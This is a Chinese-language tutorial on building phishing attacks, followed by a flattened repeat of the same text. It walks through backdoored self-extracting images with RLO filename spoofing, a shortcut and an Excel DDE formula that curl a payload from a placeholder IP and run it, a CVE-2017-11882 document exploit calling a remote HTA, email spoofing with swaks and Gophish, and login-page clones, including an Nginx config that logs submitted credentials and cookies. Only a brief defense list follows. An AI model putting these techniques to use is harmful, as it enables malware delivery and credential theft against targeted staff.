一文就学会网络钓鱼“骚”姿势

字数 1504 2025-08-20 18:16:58

网络钓鱼攻击技术详解

一、网络钓鱼概述

网络钓鱼(Phishing)是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。

目标人群选择

HR、销售、文员等安全意识较薄弱的人员
运维、开发等掌握重要资源的人员

二、高质量鱼饵制作技术

0x01. 自解压+RLO技术

制作思路：利用自解压文件的特性自动执行恶意文件，使用RLO(从右到左覆盖)技术进行文件名伪装。

实施步骤：

使用Cobalt Strike(CS)生成Windows后门
准备一张图片，使用WinRAR将后门和图片一起自解压
- 解压路径：C:\windows\temp
- 解压后运行：C:\windows\temp\artifact.exe和C:\windows\temp\壁纸.jpg
- 模式：全部隐藏
- 更新模式：解压并更新文件
- 覆盖模式：覆盖所有文件
使用Resource Hacker更换文件图标
重命名为壁纸gpj.exe并使用RLO反转后缀

效果：受害者双击"图片"会同时执行后门程序和显示图片

0x02. 快捷方式钓鱼

制作思路：通过快捷方式执行命令下载并运行恶意程序。

实施步骤：

CS生成后门并放在服务器上

创建快捷方式，目标写入：

C:\Windows\System32\cmd.exe /k curl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe

更换图标增加真实性

0x03. Word宏病毒

原理：利用Word中的VBA宏代码执行恶意行为。

实施步骤：

使用CS生成恶意VBA代码
新建doc文档并创建宏
保存文档，受害者启用宏后即上线

0x04. Excel注入

原理：利用Excel公式执行系统命令。

实施方法：

弹出计算器：
```
=cmd| '/c calc'! '!A1'
```

上线CS：

=cmd| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --output C:\Windows\temp\win.exe && C:\Windows\temp\win.exe' ! 'A1'

0x05. CVE-2017-11882漏洞利用

特点：比宏病毒更隐蔽的Word钓鱼方式。

实施步骤：

使用POC工具生成恶意doc文件：

python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

结合MSF使用：

python2 Command109b_CVE-2017-11882.py -c "mshta http://192.168.126.132:8080/Uf7DGFz.hta" -o 通知文件.doc -i input.rtf

三、邮件伪造技术

1. Swaks工具

Kali自带的邮件伪造工具，基本用法：

swaks --to 目标邮箱 --from 发件人 --ehlo 伪造头 --body 邮件内容 --header "Subject: 标题" --attach 附件

2. Gophish工具

开源钓鱼工具包，提供Web面板和完整功能：

邮件编辑
网站克隆
数据可视化
批量发送

使用场景：

伪造中奖通知邮件并发送附件
邮件中插入克隆网站(如QQ邮箱登录页面)

四、网站克隆技术

1. SEToolkit克隆

步骤：

启动setoolkit选择"Social-Engineering Attacks"
选择"Website Attack Vectors"
选择"Credential Harvester Attack Method"
选择"Site Cloner"
输入目标网站

HTA注入攻击：
通过克隆站点植入HTA脚本，受害者访问时会触发反弹Shell。

2. Nginx反向代理克隆

原理：利用Nginx反向代理功能记录用户提交的凭证。

配置要点：

在nginx.conf中添加自定义日志格式：

log_format Clonelog escape=json '{$remote_addr|' '$request_filename|' '$request_body|' '$http_cookie|' '$http_x_forwarded_for|' '$time_local}';

配置反向代理服务器：

server {
    listen 8000;
    server_name 127.0.0.1;
    access_log /www/wwwlogs/access.log Clonelog;
    location / {
        proxy_pass http://目标网站;
        proxy_set_header Host "目标域名";
    }
}

3. 前端页面手动克隆

步骤：

使用浏览器"另存为"功能保存目标网站前端代码
修改表单提交地址到自己的服务器
调整CSS样式确保显示正常
编写后端脚本记录凭证
购买相似域名增加可信度

关键点：

确保获取正确的表单字段name值
提交后跳转回真实网站保持隐蔽性
设计合理的错误提示增加真实性

五、防御建议

对可疑邮件附件保持警惕
禁用Office宏功能
检查文件真实扩展名
使用双因素认证
定期进行安全意识培训
保持系统和软件更新
使用专业安全防护软件

通过以上技术的组合使用，攻击者可以构建高度逼真的钓鱼攻击链。防御方需要从技术和管理多个层面建立防护体系。

网络钓鱼攻击技术详解一、网络钓鱼概述网络钓鱼(Phishing)是通过伪造银行或其他知名机构向他人发送垃圾邮件，意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATM PIN码或信用卡详细信息)的一种攻击方式。目标人群选择 HR、销售、文员等安全意识较薄弱的人员运维、开发等掌握重要资源的人员二、高质量鱼饵制作技术 0x01. 自解压+RLO技术制作思路：利用自解压文件的特性自动执行恶意文件，使用RLO(从右到左覆盖)技术进行文件名伪装。实施步骤：使用Cobalt Strike(CS)生成Windows后门准备一张图片，使用WinRAR将后门和图片一起自解压解压路径： C:\windows\temp 解压后运行： C:\windows\temp\artifact.exe 和 C:\windows\temp\壁纸.jpg 模式：全部隐藏更新模式：解压并更新文件覆盖模式：覆盖所有文件使用Resource Hacker更换文件图标重命名为壁纸gpj.exe 并使用RLO反转后缀效果：受害者双击"图片"会同时执行后门程序和显示图片 0x02. 快捷方式钓鱼制作思路：通过快捷方式执行命令下载并运行恶意程序。实施步骤： CS生成后门并放在服务器上创建快捷方式，目标写入：更换图标增加真实性 0x03. Word宏病毒原理：利用Word中的VBA宏代码执行恶意行为。实施步骤：使用CS生成恶意VBA代码新建doc文档并创建宏保存文档，受害者启用宏后即上线 0x04. Excel注入原理：利用Excel公式执行系统命令。实施方法：弹出计算器：上线CS： 0x05. CVE-2017-11882漏洞利用特点：比宏病毒更隐蔽的Word钓鱼方式。实施步骤：使用POC工具生成恶意doc文件：结合MSF使用：三、邮件伪造技术 1. Swaks工具 Kali自带的邮件伪造工具，基本用法： 2. Gophish工具开源钓鱼工具包，提供Web面板和完整功能：邮件编辑网站克隆数据可视化批量发送使用场景：伪造中奖通知邮件并发送附件邮件中插入克隆网站(如QQ邮箱登录页面) 四、网站克隆技术 1. SEToolkit克隆步骤：启动setoolkit选择"Social-Engineering Attacks" 选择"Website Attack Vectors" 选择"Credential Harvester Attack Method" 选择"Site Cloner" 输入目标网站 HTA注入攻击：通过克隆站点植入HTA脚本，受害者访问时会触发反弹Shell。 2. Nginx反向代理克隆原理：利用Nginx反向代理功能记录用户提交的凭证。配置要点：在nginx.conf中添加自定义日志格式：配置反向代理服务器： 3. 前端页面手动克隆步骤：使用浏览器"另存为"功能保存目标网站前端代码修改表单提交地址到自己的服务器调整CSS样式确保显示正常编写后端脚本记录凭证购买相似域名增加可信度关键点：确保获取正确的表单字段name值提交后跳转回真实网站保持隐蔽性设计合理的错误提示增加真实性五、防御建议对可疑邮件附件保持警惕禁用Office宏功能检查文件真实扩展名使用双因素认证定期进行安全意识培训保持系统和软件更新使用专业安全防护软件通过以上技术的组合使用，攻击者可以构建高度逼真的钓鱼攻击链。防御方需要从技术和管理多个层面建立防护体系。